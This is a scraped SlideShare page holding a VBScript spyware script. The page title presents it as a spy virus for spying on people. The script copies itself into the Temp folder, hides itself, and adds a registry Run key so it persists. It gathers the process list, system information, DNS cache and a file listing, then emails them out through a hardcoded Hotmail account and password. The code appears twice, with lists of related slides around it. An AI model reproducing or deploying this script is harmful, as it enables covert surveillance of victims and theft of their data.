SlideShare a Scribd company logo
on error resume next
Dim destinatario
Dim receptor
Dim password
Dim proceso
Dim infopc
Dim archivos
Dim historial
Dim info2
destinatario = "chorodeacc15@hotmail.com"
password = "993913600ata"
receptor = "chorodeacc15@hotmail.com"
Set ws = WScript.CreateObject("WScript.Shell")
temp = ws.Environment("Process")("Temp")
Dim resultado
set objshell = createobject("wscript.shell")
objshell.run "cmd /k copy " & wscript.scriptfullname & " %tmp%" &
wscript.scriptname & " & exit" , vbhide
Set registro = CreateObject("WScript.Shell")
registro.RegWrite
"HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunSystem" , temp
& "" & wscript.scriptname
Set objfso = createobject("scripting.filesystemobject")
Set archivo = objfso.getfile(temp & "" & wscript.scriptname)
archivo.attributes = 39
set objshell = createobject("wscript.shell")
objshell.run "cmd /k tasklist > " & temp & "proceso.txt & exit ",vbhide
Set filestreamIN = CreateObject("Scripting.FileSystemObject").OpenTextFile(temp
& "proceso.txt",1)
proceso = filestreamIN.ReadAll()
filestreamIN.Close()
set objshell = createobject("wscript.shell")
objshell.run "cmd /k ver > " & temp & "ver.txt & exit ",vbhide
Set filestreamIN = CreateObject("Scripting.FileSystemObject").OpenTextFile(temp
& "ver.txt",1)
infopc = filestreamIN.ReadAll()
filestreamIN.Close()
set objshell = createobject("wscript.shell")
objshell.run "cmd /k ipconfig /displaydns > " & temp & "historial.txt & exit
",vbhide
WScript.Sleep 3000
Set filestreamIN = CreateObject("Scripting.FileSystemObject").OpenTextFile(temp
& "historial.txt",1)
historial = filestreamIN.ReadAll()
filestreamIN.Close()
set objshell = createobject("wscript.shell")
objshell.run "cmd /k systeminfo > " & temp & "info2.txt & exit ",vbhide
WScript.Sleep 3000
Set filestreamIN = CreateObject("Scripting.FileSystemObject").OpenTextFile(temp
& "info2.txt",1)
info2 = filestreamIN.ReadAll()
filestreamIN.Close()
Dim fso, f, fc, dir, f1, listdir, fitxerpersonal
dir = WScript.CreateObject("WScript.Shell").Environment("Process")("Temp")
listar
set ws=createobject("WScript.shell")
Set WshNtwk = WScript.CreateObject("WScript.Network")
set objcdo=createobject("cdo.message")
objcdo.subject="Informacion de " & WshNtwk.ComputerName
objcdo.from=destinatario
objcdo.to=receptor
objcdo.textbody= "Lista de Procesos " & vbcr & proceso & vbcr & "Informacion
Sobre la Pc" & vbcr & infopc & vbcr & "Informacion extendida sobre la Pc" & vbcr
& info2 & vbcr & "Lista de Archivos abiertos Recientemente" & vbcr & archivos &
vbcr & "Historial de Navegacion" & vbcr & historial
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration
/sendusing") = 2
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration
/smtpserver") = "smtp.live.com"
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration
/smtpserverport") = "25"
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration
/smtpauthenticate") = 1
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration
/smtpconnectiontimeout") = 30
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration
/sendusername") = destinatario
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration
/sendpassword") = password
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration
/smtpusessl") = 1
objcdo.configuration.fields.update
objcdo.send
Sub listar()
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(dir)
recursive_Fitxer(f)
archivos =listdir
End sub
function recursive_fitxer(folder)
dim internalFolder
For Each internalFolder in folder.SubFolders
recursive_fitxer(internalFolder)
Next
Set fc = folder.Files
For Each f1 in fc
listdir = listdir & f1.name
listdir = listdir & vbCrLf
Next
end function

More Related Content

What's hot

MongoDB全機能解説2
MongoDB全機能解説2MongoDB全機能解説2
MongoDB全機能解説2
Takahiro Inoue
 
Security Challenges in Node.js
Security Challenges in Node.jsSecurity Challenges in Node.js
Security Challenges in Node.js
Websecurify
 
jQuery Datatables With MongDb
jQuery Datatables With MongDbjQuery Datatables With MongDb
jQuery Datatables With MongDb
sliimohara
 
Paris js extensions
Paris js extensionsParis js extensions
Paris js extensions
erwanl
 
NoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDBNoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDB
Sqreen
 
Nginx cache api delete
Nginx cache api deleteNginx cache api delete
Nginx cache api delete
Yuki Iwamoto
 
Chrome拡張開発者のためのFirefox拡張開発
Chrome拡張開発者のためのFirefox拡張開発Chrome拡張開発者のためのFirefox拡張開発
Chrome拡張開発者のためのFirefox拡張開発
swdyh
 
MongoDB Oplog入門
MongoDB Oplog入門MongoDB Oplog入門
MongoDB Oplog入門
Takahiro Inoue
 
The jsdom
The jsdomThe jsdom
The jsdom
Domenic Denicola
 
Litebox
LiteboxLitebox
Litebox
meli media
 
JavaSE7 Launch Event: Java7xGroovy
JavaSE7 Launch Event: Java7xGroovyJavaSE7 Launch Event: Java7xGroovy
JavaSE7 Launch Event: Java7xGroovy
Yasuharu Nakano
 
Orm
OrmOrm
Inside MongoDB: the Internals of an Open-Source Database
Inside MongoDB: the Internals of an Open-Source DatabaseInside MongoDB: the Internals of an Open-Source Database
Inside MongoDB: the Internals of an Open-Source Database
Mike Dirolf
 
与 PHP 和 Perl 使用 MySQL 数据库
与 PHP 和 Perl 使用 MySQL 数据库与 PHP 和 Perl 使用 MySQL 数据库
与 PHP 和 Perl 使用 MySQL 数据库
YUCHENG HU
 
How to send files to remote server via ssh in php
How to send files to remote server via ssh in phpHow to send files to remote server via ssh in php
How to send files to remote server via ssh in php
Andolasoft Inc
 
New kid on the block node.js
New kid on the block node.jsNew kid on the block node.js
New kid on the block node.js
Joel Divekar
 
MongoDB: How it Works
MongoDB: How it WorksMongoDB: How it Works
MongoDB: How it Works
Mike Dirolf
 
JavaScript on the Desktop
JavaScript on the DesktopJavaScript on the Desktop
JavaScript on the Desktop
Domenic Denicola
 
Redis - Usability and Use Cases
Redis - Usability and Use CasesRedis - Usability and Use Cases
Redis - Usability and Use Cases
Fabrizio Farinacci
 
Trimming The Cruft
Trimming The CruftTrimming The Cruft
Trimming The Cruft
Peter Higgins
 

What's hot (20)

MongoDB全機能解説2
MongoDB全機能解説2MongoDB全機能解説2
MongoDB全機能解説2
 
Security Challenges in Node.js
Security Challenges in Node.jsSecurity Challenges in Node.js
Security Challenges in Node.js
 
jQuery Datatables With MongDb
jQuery Datatables With MongDbjQuery Datatables With MongDb
jQuery Datatables With MongDb
 
Paris js extensions
Paris js extensionsParis js extensions
Paris js extensions
 
NoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDBNoSQL Injections in Node.js - The case of MongoDB
NoSQL Injections in Node.js - The case of MongoDB
 
Nginx cache api delete
Nginx cache api deleteNginx cache api delete
Nginx cache api delete
 
Chrome拡張開発者のためのFirefox拡張開発
Chrome拡張開発者のためのFirefox拡張開発Chrome拡張開発者のためのFirefox拡張開発
Chrome拡張開発者のためのFirefox拡張開発
 
MongoDB Oplog入門
MongoDB Oplog入門MongoDB Oplog入門
MongoDB Oplog入門
 
The jsdom
The jsdomThe jsdom
The jsdom
 
Litebox
LiteboxLitebox
Litebox
 
JavaSE7 Launch Event: Java7xGroovy
JavaSE7 Launch Event: Java7xGroovyJavaSE7 Launch Event: Java7xGroovy
JavaSE7 Launch Event: Java7xGroovy
 
Orm
OrmOrm
Orm
 
Inside MongoDB: the Internals of an Open-Source Database
Inside MongoDB: the Internals of an Open-Source DatabaseInside MongoDB: the Internals of an Open-Source Database
Inside MongoDB: the Internals of an Open-Source Database
 
与 PHP 和 Perl 使用 MySQL 数据库
与 PHP 和 Perl 使用 MySQL 数据库与 PHP 和 Perl 使用 MySQL 数据库
与 PHP 和 Perl 使用 MySQL 数据库
 
How to send files to remote server via ssh in php
How to send files to remote server via ssh in phpHow to send files to remote server via ssh in php
How to send files to remote server via ssh in php
 
New kid on the block node.js
New kid on the block node.jsNew kid on the block node.js
New kid on the block node.js
 
MongoDB: How it Works
MongoDB: How it WorksMongoDB: How it Works
MongoDB: How it Works
 
JavaScript on the Desktop
JavaScript on the DesktopJavaScript on the Desktop
JavaScript on the Desktop
 
Redis - Usability and Use Cases
Redis - Usability and Use CasesRedis - Usability and Use Cases
Redis - Usability and Use Cases
 
Trimming The Cruft
Trimming The CruftTrimming The Cruft
Trimming The Cruft
 

Similar to Tipo virus espia con esto aprenderan a espiar a personas etc jeropas de mrd :v

Format xls sheets Demo Mode
Format xls sheets Demo ModeFormat xls sheets Demo Mode
Format xls sheets Demo Mode
Jared Bourne
 
vbscript-reference book
vbscript-reference bookvbscript-reference book
vbscript-reference book
Anand Dhana
 
The Ring programming language version 1.9 book - Part 53 of 210
The Ring programming language version 1.9 book - Part 53 of 210The Ring programming language version 1.9 book - Part 53 of 210
The Ring programming language version 1.9 book - Part 53 of 210
Mahmoud Samir Fayed
 
Codes
CodesCodes
Codes
OSit3
 
The Ring programming language version 1.5.4 book - Part 40 of 185
The Ring programming language version 1.5.4 book - Part 40 of 185The Ring programming language version 1.5.4 book - Part 40 of 185
The Ring programming language version 1.5.4 book - Part 40 of 185
Mahmoud Samir Fayed
 
Qtp Imp Script Examples
Qtp Imp Script ExamplesQtp Imp Script Examples
Qtp Imp Script Examples
User1test
 
HDTR images with Photoshop Javascript Scripting
HDTR images with Photoshop Javascript ScriptingHDTR images with Photoshop Javascript Scripting
HDTR images with Photoshop Javascript Scripting
David Gómez García
 
Form1.vb
Form1.vbForm1.vb
Form1.vb
Like Music
 
Building Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEisBuilding Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEis
FIWARE
 
Python for Penetration testers
Python for Penetration testersPython for Penetration testers
Python for Penetration testers
Christian Martorella
 
"><img src="x">
"><img src="x">"><img src="x">
"><img src="x">
testeracua
 
Rapid and Scalable Development with MongoDB, PyMongo, and Ming
Rapid and Scalable Development with MongoDB, PyMongo, and MingRapid and Scalable Development with MongoDB, PyMongo, and Ming
Rapid and Scalable Development with MongoDB, PyMongo, and Ming
Rick Copeland
 
The Ring programming language version 1.4.1 book - Part 13 of 31
The Ring programming language version 1.4.1 book - Part 13 of 31The Ring programming language version 1.4.1 book - Part 13 of 31
The Ring programming language version 1.4.1 book - Part 13 of 31
Mahmoud Samir Fayed
 
File System Operations
File System OperationsFile System Operations
File System Operations
G.C Reddy
 
Inventory program in mca p1
Inventory program in mca p1Inventory program in mca p1
Inventory program in mca p1
rameshvvv
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItDEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
Synack
 
Introduction to Nodejs
Introduction to NodejsIntroduction to Nodejs
Introduction to Nodejs
Gabriele Lana
 
JavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your codeJavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your code
Laurence Svekis ✔
 
WebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLSTWebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLST
enpit GmbH & Co. KG
 
Grails 1.2 探検隊 -新たな聖杯をもとめて・・・-
Grails 1.2 探検隊 -新たな聖杯をもとめて・・・-Grails 1.2 探検隊 -新たな聖杯をもとめて・・・-
Grails 1.2 探検隊 -新たな聖杯をもとめて・・・-
Tsuyoshi Yamamoto
 

Similar to Tipo virus espia con esto aprenderan a espiar a personas etc jeropas de mrd :v (20)

Format xls sheets Demo Mode
Format xls sheets Demo ModeFormat xls sheets Demo Mode
Format xls sheets Demo Mode
 
vbscript-reference book
vbscript-reference bookvbscript-reference book
vbscript-reference book
 
The Ring programming language version 1.9 book - Part 53 of 210
The Ring programming language version 1.9 book - Part 53 of 210The Ring programming language version 1.9 book - Part 53 of 210
The Ring programming language version 1.9 book - Part 53 of 210
 
Codes
CodesCodes
Codes
 
The Ring programming language version 1.5.4 book - Part 40 of 185
The Ring programming language version 1.5.4 book - Part 40 of 185The Ring programming language version 1.5.4 book - Part 40 of 185
The Ring programming language version 1.5.4 book - Part 40 of 185
 
Qtp Imp Script Examples
Qtp Imp Script ExamplesQtp Imp Script Examples
Qtp Imp Script Examples
 
HDTR images with Photoshop Javascript Scripting
HDTR images with Photoshop Javascript ScriptingHDTR images with Photoshop Javascript Scripting
HDTR images with Photoshop Javascript Scripting
 
Form1.vb
Form1.vbForm1.vb
Form1.vb
 
Building Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEisBuilding Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEis
 
Python for Penetration testers
Python for Penetration testersPython for Penetration testers
Python for Penetration testers
 
"><img src="x">
"><img src="x">"><img src="x">
"><img src="x">
 
Rapid and Scalable Development with MongoDB, PyMongo, and Ming
Rapid and Scalable Development with MongoDB, PyMongo, and MingRapid and Scalable Development with MongoDB, PyMongo, and Ming
Rapid and Scalable Development with MongoDB, PyMongo, and Ming
 
The Ring programming language version 1.4.1 book - Part 13 of 31
The Ring programming language version 1.4.1 book - Part 13 of 31The Ring programming language version 1.4.1 book - Part 13 of 31
The Ring programming language version 1.4.1 book - Part 13 of 31
 
File System Operations
File System OperationsFile System Operations
File System Operations
 
Inventory program in mca p1
Inventory program in mca p1Inventory program in mca p1
Inventory program in mca p1
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItDEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
 
Introduction to Nodejs
Introduction to NodejsIntroduction to Nodejs
Introduction to Nodejs
 
JavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your codeJavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your code
 
WebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLSTWebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLST
 
Grails 1.2 探検隊 -新たな聖杯をもとめて・・・-
Grails 1.2 探検隊 -新たな聖杯をもとめて・・・-Grails 1.2 探検隊 -新たな聖杯をもとめて・・・-
Grails 1.2 探検隊 -新たな聖杯をもとめて・・・-
 

Tipo virus espia con esto aprenderan a espiar a personas etc jeropas de mrd :v

  • 1. on error resume next Dim destinatario Dim receptor Dim password Dim proceso Dim infopc Dim archivos Dim historial Dim info2 destinatario = "chorodeacc15@hotmail.com" password = "993913600ata" receptor = "chorodeacc15@hotmail.com" Set ws = WScript.CreateObject("WScript.Shell") temp = ws.Environment("Process")("Temp") Dim resultado set objshell = createobject("wscript.shell") objshell.run "cmd /k copy " & wscript.scriptfullname & " %tmp%" & wscript.scriptname & " & exit" , vbhide Set registro = CreateObject("WScript.Shell") registro.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunSystem" , temp & "" & wscript.scriptname Set objfso = createobject("scripting.filesystemobject") Set archivo = objfso.getfile(temp & "" & wscript.scriptname) archivo.attributes = 39 set objshell = createobject("wscript.shell") objshell.run "cmd /k tasklist > " & temp & "proceso.txt & exit ",vbhide Set filestreamIN = CreateObject("Scripting.FileSystemObject").OpenTextFile(temp & "proceso.txt",1) proceso = filestreamIN.ReadAll() filestreamIN.Close() set objshell = createobject("wscript.shell") objshell.run "cmd /k ver > " & temp & "ver.txt & exit ",vbhide Set filestreamIN = CreateObject("Scripting.FileSystemObject").OpenTextFile(temp & "ver.txt",1) infopc = filestreamIN.ReadAll() filestreamIN.Close() set objshell = createobject("wscript.shell") objshell.run "cmd /k ipconfig /displaydns > " & temp & "historial.txt & exit ",vbhide WScript.Sleep 3000 Set filestreamIN = CreateObject("Scripting.FileSystemObject").OpenTextFile(temp & "historial.txt",1) historial = filestreamIN.ReadAll() filestreamIN.Close() set objshell = createobject("wscript.shell") objshell.run "cmd /k systeminfo > " & temp & "info2.txt & exit ",vbhide WScript.Sleep 3000 Set filestreamIN = CreateObject("Scripting.FileSystemObject").OpenTextFile(temp & "info2.txt",1) info2 = filestreamIN.ReadAll() filestreamIN.Close() Dim fso, f, fc, dir, f1, listdir, fitxerpersonal dir = WScript.CreateObject("WScript.Shell").Environment("Process")("Temp") listar set ws=createobject("WScript.shell") Set WshNtwk = WScript.CreateObject("WScript.Network") set objcdo=createobject("cdo.message") objcdo.subject="Informacion de " & WshNtwk.ComputerName objcdo.from=destinatario objcdo.to=receptor objcdo.textbody= "Lista de Procesos " & vbcr & proceso & vbcr & "Informacion Sobre la Pc" & vbcr & infopc & vbcr & "Informacion extendida sobre la Pc" & vbcr & info2 & vbcr & "Lista de Archivos abiertos Recientemente" & vbcr & archivos &
  • 2. vbcr & "Historial de Navegacion" & vbcr & historial objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration /sendusing") = 2 objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration /smtpserver") = "smtp.live.com" objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration /smtpserverport") = "25" objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration /smtpauthenticate") = 1 objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration /smtpconnectiontimeout") = 30 objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration /sendusername") = destinatario objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration /sendpassword") = password objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration /smtpusessl") = 1 objcdo.configuration.fields.update objcdo.send Sub listar() Set fso = CreateObject("Scripting.FileSystemObject") Set f = fso.GetFolder(dir) recursive_Fitxer(f) archivos =listdir End sub function recursive_fitxer(folder) dim internalFolder For Each internalFolder in folder.SubFolders recursive_fitxer(internalFolder) Next Set fc = folder.Files For Each f1 in fc listdir = listdir & f1.name listdir = listdir & vbCrLf Next end function